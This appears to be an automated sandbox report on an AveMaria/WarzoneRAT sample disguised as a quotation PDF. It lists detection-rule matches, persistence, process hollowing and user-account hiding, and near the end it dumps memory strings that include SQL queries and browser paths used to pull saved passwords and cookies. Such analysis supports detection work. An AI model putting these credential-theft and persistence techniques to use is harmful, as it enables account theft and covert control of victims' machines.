Source: 3.3.order_of_quotationpdf.exe.715910.2.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.order_of_quotationpdf.exe.37cc124.3.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth (Nextron Systems), description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0.2.order_of_quotationpdf.exe.37cc124.3.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth (Nextron Systems), description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0.2.order_of_quotationpdf.exe.37cc124.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth (Nextron Systems), description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.order_of_quotationpdf.exe.37cc124.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 0.2.order_of_quotationpdf.exe.37cc124.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 0.2.order_of_quotationpdf.exe.37cc124.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 0.2.order_of_quotationpdf.exe.37cc124.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 0.2.order_of_quotationpdf.exe.37cc124.3.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth (Nextron Systems), description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000000.00000002.401456152.0000000003747000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth (Nextron Systems), description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000000.00000002.401456152.0000000003747000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth (Nextron Systems), description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000003.00000003.403463816.0000000000715000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth (Nextron Systems), description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000003.00000003.403463816.0000000000715000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 00000000.00000002.402471739.0000000004749000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth (Nextron Systems), description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000000.00000002.402471739.0000000004749000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 00000000.00000002.402471739.00000000046B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth (Nextron Systems), description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000000.00000002.402471739.00000000046B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 00000000.00000002.401456152.00000000036A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth (Nextron Systems), description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000000.00000002.401456152.00000000036A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23

Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Code function: WinExec,WinExec,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleFileNameA,CharLowerW,CharLowerW,lstrcmpW,CreateProcessA,CloseHandle,CloseHandle,ExitProcess,ExitProcess,GetPrivateProfileStringW, shutdown.exe /r /t 00		3_2_0040518B
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Code function: WinExec,WinExec,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleFileNameA,CharLowerW,CharLowerW,lstrcmpW,CreateProcessA,CloseHandle,CloseHandle,ExitProcess,ExitProcess,GetPrivateProfileStringW, shutdown.exe /r /f /t 00		3_2_0040518B

Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Code function: String function: 0041FF80 appears 52 times
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Code function: String function: 00406F64 appears 46 times
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Code function: String function: 00406C53 appears 38 times

Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Code function: 0_2_078F1930 NtUnmapViewOfSection,		0_2_078F1930
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Code function: 0_2_078F1928 NtUnmapViewOfSection,		0_2_078F1928

Source: order_of_quotationpdf.exe, 00000000.00000003.391736408.00000000061FD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesharp.exe6 vs order_of_quotationpdf.exe
Source: order_of_quotationpdf.exe, 00000000.00000000.319429103.0000000001367000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamesharp.exe6 vs order_of_quotationpdf.exe
Source: order_of_quotationpdf.exe, 00000000.00000002.404408183.00000000070A0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameFlnffsxvosnwslyju.dll" vs order_of_quotationpdf.exe
Source: order_of_quotationpdf.exe, 00000000.00000002.405701445.0000000007380000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs order_of_quotationpdf.exe
Source: order_of_quotationpdf.exe	Binary or memory string: OriginalFilenamesharp.exe6 vs order_of_quotationpdf.exe

Source: order_of_quotationpdf.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\order_of_quotationpdf.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Cfflo

Jump to behavior

Source: classification engine

Classification label: mal100.phis.troj.spyw.expl.evad.winEXE@6/7@4/2

Source: C:\Users\user\Desktop\order_of_quotationpdf.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\order_of_quotationpdf.exe

Code function: 3_2_0041AC18 OpenSCManagerW,OpenServiceW,CloseServiceHandle,ChangeServiceConfigW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

3_2_0041AC18

Source: C:\Users\user\Desktop\order_of_quotationpdf.exe

Code function: 3_2_004218D5 GetModuleFileNameW,IsUserAnAdmin,FindResourceW,LoadResource,SizeofResource,LockResource,

3_2_004218D5

Source: C:\Users\user\Desktop\order_of_quotationpdf.exe

File created: C:\Program Files\Microsoft DN1

Jump to behavior

Source: C:\Users\user\Desktop\order_of_quotationpdf.exe

File read: C:\Users\user\Desktop\order_of_quotationpdf.exe

Jump to behavior

Source: C:\Users\user\Desktop\order_of_quotationpdf.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\order_of_quotationpdf.exe C:\Users\user\Desktop\order_of_quotationpdf.exe
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Process created: C:\Users\user\Desktop\order_of_quotationpdf.exe C:\Users\user\Desktop\order_of_quotationpdf.exe
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Process created: C:\Users\user\Desktop\order_of_quotationpdf.exe C:\Users\user\Desktop\order_of_quotationpdf.exe	Jump to behavior

Source: C:\Users\user\Desktop\order_of_quotationpdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{62BE5D10-60EB-11d0-BD3B-00A0C911CE86}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\order_of_quotationpdf.exe

Code function: 3_2_0041E04E OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,

3_2_0041E04E

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_matvrvpa.2uf.ps1

Jump to behavior

Source: C:\Users\user\Desktop\order_of_quotationpdf.exe

Code function: 3_2_0041E344 CoInitializeSecurity,CoInitialize,CoCreateInstance,VariantInit,

3_2_0041E344

Source: order_of_quotationpdf.exe	Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior

Source: C:\Users\user\Desktop\order_of_quotationpdf.exe

Code function: 3_2_00420444 CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,Process32NextW,CloseHandle,

3_2_00420444

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7008:120:WilError_01

Source: order_of_quotationpdf.exe	String found in binary or memory: The object state cannot be changed. This exception may result from one or more of the primary key properties being set to null. Non-Added objects cannot have null primary key values. See inner exception for details.
Source: order_of_quotationpdf.exe	String found in binary or memory: Could not load assembly '{0}'. (If you are using Code First Migrations inside Visual Studio this can happen if the startUp project for your solution does not reference the project that contains your migrations. You can either change the startUp project for your solution or use the -StartUpProjectName parameter.)
Source: order_of_quotationpdf.exe	String found in binary or memory: , name := ), clustered := False-addForeignKeyOperation
Source: order_of_quotationpdf.exe	String found in binary or memory: DropForeignKey(-addPrimaryKeyOperation

Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Users\user\Desktop\order_of_quotationpdf.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: order_of_quotationpdf.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: order_of_quotationpdf.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: C:\Users\user\Desktop\order_of_quotationpdf.exe

Directory created: C:\Program Files\Microsoft DN1

Jump to behavior

Source: order_of_quotationpdf.exe

Static file information: File size 5464064 > 1048576

Source: order_of_quotationpdf.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x4f6400

Source: order_of_quotationpdf.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: order_of_quotationpdf.exe, 00000000.00000002.405701445.0000000007380000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256 source: order_of_quotationpdf.exe, 00000000.00000002.405701445.0000000007380000.00000004.08000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Code function: 0_2_078CB8FA pushfd ; iretd	0_2_078CB901
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Code function: 3_2_004012A0 push eax; ret	3_2_004012B4
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Code function: 3_2_004012A0 push eax; ret	3_2_004012DC
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Code function: 3_2_00426380 push ebp; retf	3_2_004263A4
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Code function: 3_2_00426390 push ebp; retf	3_2_004263A4

Source: C:\Users\user\Desktop\order_of_quotationpdf.exe

Code function: 3_2_0040AC93 getaddrinfo,socket,htons,freeaddrinfo,LoadLibraryA,GetProcAddress,WSAConnect,

3_2_0040AC93

Source: C:\Users\user\Desktop\order_of_quotationpdf.exe

Code function: 3_2_0041AB68 NetUserAdd,NetLocalGroupAddMembers,

3_2_0041AB68

Source: C:\Users\user\Desktop\order_of_quotationpdf.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Cfflo\Fjugfe.exe

Jump to dropped file

Source: C:\Users\user\Desktop\order_of_quotationpdf.exe

Code function: 3_2_004059EE URLDownloadToFileW,ShellExecuteW,

3_2_004059EE

Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Code function: 3_2_0040518B WinExec,WinExec,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleFileNameA,CharLowerW,CharLowerW,lstrcmpW,CreateProcessA,CloseHandle,CloseHandle,ExitProcess,ExitProcess,GetPrivateProfileStringW,	3_2_0040518B
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Code function: 3_2_00415E64 lstrcatW,GetBinaryTypeW,GetPrivateProfileStringW,	3_2_00415E64
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Code function: 3_2_0041579C GetBinaryTypeW,GetPrivateProfileStringW,	3_2_0041579C

Boot Survival

Creates an undocumented autostart registry key

Source: C:\Users\user\Desktop\order_of_quotationpdf.exe

Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup

Jump to behavior

Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Cfflo	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Cfflo\Fjugfe.exe	Jump to behavior
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Cfflo\Fjugfe.exe\:Zone.Identifier:$DATA	Jump to behavior

Source: C:\Users\user\Desktop\order_of_quotationpdf.exe

Code function: 3_2_0041ACE9 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,GetLastError,Sleep,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

3_2_0041ACE9

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Users\user\Desktop\order_of_quotationpdf.exe

File opened: C:\Users\user\Desktop\order_of_quotationpdf.exe:Zone.Identifier read attributes | delete

Jump to behavior

Contains functionality to hide user accounts

Source: order_of_quotationpdf.exe, 00000000.00000002.401456152.0000000003747000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: order_of_quotationpdf.exe, 00000000.00000002.401456152.0000000003747000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Y6676sqlite3_prepare_v2Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676sqlite3_column_textSoftware\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676sqlite3_column_intSoftware\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676sqlite3_opensqlite3_closesqlite3_column_int64sqlite3_column_countsqlite3_data_countsqlite3_stepsqlite3_execsqlite3_open_v2sqlite3_column_blobsqlite3_column_typesqlite3_column_bytessqlite3_close_v2sqlite3_finalizeStorage",*Accounts\Account.rec0software\Aerofox\FoxmailPreviewExecutableAESChainingModeGCMChainingMode"encrypted_key":""}DPAPITermService%ProgramFiles%%windir%\System32%ProgramW6432%%ProgramFiles%\Microsoft DN1\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dll\sqlmap.dllrudprpdprudpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListrpdpSeDebugPrivilege%SystemRoot%\System32\termsrv.dllrudprpdpSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDll127.0.0.1SYSTEM\CurrentControlSet\Services\TermServiceImagePathSYSTEM\CurrentControlSet\Services\TermService\Parameterssvchost.exesvchost.exe -kServiceDllCertPropSvcSessionEnvServicesActiveEnableConcurrentSessionsSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllAllowMultipleTSSessionsNameSYSTEM\CurrentControlSet\Control\Termina
Source: order_of_quotationpdf.exe, 00000000.00000002.401456152.0000000003747000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Profile %dDefault\.tmp\.tmpselect signon_realm, origin_url, username_value, password_value from wow_loginsselect signon_realm, origin_url, username_value, password_value from loginsPassword\.tmp\.tmpselect host_key, path, name, encrypted_value, expires_utc, is_httponly, samesite, is_secure from cookiesPassword\Mozilla\Firefox\profiles.iniProfilePath\cookies.sqlite\Blisk\User Data\Local StateSELECT host, path, name, value, expiry, isHttpOnly, isSecure FROM moz_cookies\Google\Chrome\User Data\Local State\Torch\User Data\Local State\Google\Chrome\User Data\Default\Network\CookiesPath\Microsoft\Edge\User Data\Local Statesoftokn3.dll\Microsoft\Edge\User Data\Default\Network\Cookiesmsvcp140.dll\Google\Chrome\User Data\Local Statemozglue.dllvcruntime140.dll\Google\Chrome\User Data\Default\Login Data\Google\Chrome Beta\User Data\Local Statenss3.dll\Google\Chrome Beta\User Data\Default\Login Datafreebl3.dll\\Epic Privacy Browser\User Data\Local State\Epic Privacy Browser\User Data\Default\Login Data\Microsoft\Edge\User Data\Local Statenss3.dll\Microsoft\Edge\User Data\Default\Login Datamsvcr120.dll\UCBrowser\User Data_i18n\Local Statemsvcp120.dll\UCBrowser\User Data_i18n\Default\UC Login Data.17\Tencent\QQBrowser\User Data\Local Statemozglue.dllsoftokn3.dll\Tencent\QQBrowser\User Data\Default\Login Data\Opera Software\Opera Stable\Local Statevcruntime140.dll\Opera Software\Opera Stable\Login Data\Blisk\User Data\Default\Login Data\Chromium\User Data\Local State\Chromium\User Data\Default\Login Data\BraveSoftware\Brave-Browser\User Data\Local State\BraveSoftware\Brave-Browser\User Data\Default\Login Data\Vivaldi\User Data\Local Statemsvcp\Vivaldi\User Data\Default\Login Datamsvcr\Comodo\Dragon\User Data\Local State.dll\Comodo\Dragon\User Data\Default\Login Data\Torch\User Data\Default\Login Data\Slimjet\User Data\Local State\Slimjet\User Data\Default\Login Data.dll\CentBrowser\User Data\Local State\CentBrowser\User Data\Default\Login DataNSS_InitSoftware\Microsoft\Windows\CurrentVersion\App Paths\PK11_GetInternalKeySlotPK11_AuthenticatePK11SDR_DecryptNSSBase64_DecodeBufferPK11_CheckUserPasswordNSS_ShutdownPK11_FreeSlotPR_GetError\nss3.dllmsvcr120.dllmsvcp120.dllmozglue.dllsoftokn3.dllmsvcpmsvcr.dll.dllNSS_InitPK11_GetInternalKeySlotPK11_AuthenticatePK11SDR_DecryptNSSBase64_DecodeBufferPK11_CheckUserPasswordNSS_ShutdownPK11_FreeSlotPR_GetErrorvaultcli.dllVaultOpenVaultVaultCloseVaultVaultEnumerateItemsVaultGetItemVaultGetItemVaultFreeInternet ExplorerInternet ExplorerProfilefirefox.exe\firefox.exe\Mozilla\Firefox\profiles.iniProfilePathProfile\logins.json\.tmpencryptedUsernamehostnameencryptedUsernameencryptedPasswordProfilethunderbird.exe\Thunderbird\profiles.iniProfilePathProfile\logins.json\.tmpencryptedUsernamehostnameencryptedUsernameencryptedPasswordCould not decryptAccount NameEmailPOP3 ServerPOP3 UserSMTP ServerPOP3 PasswordSMTP PasswordHTTP PasswordIMAP PasswordSoftware\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676S
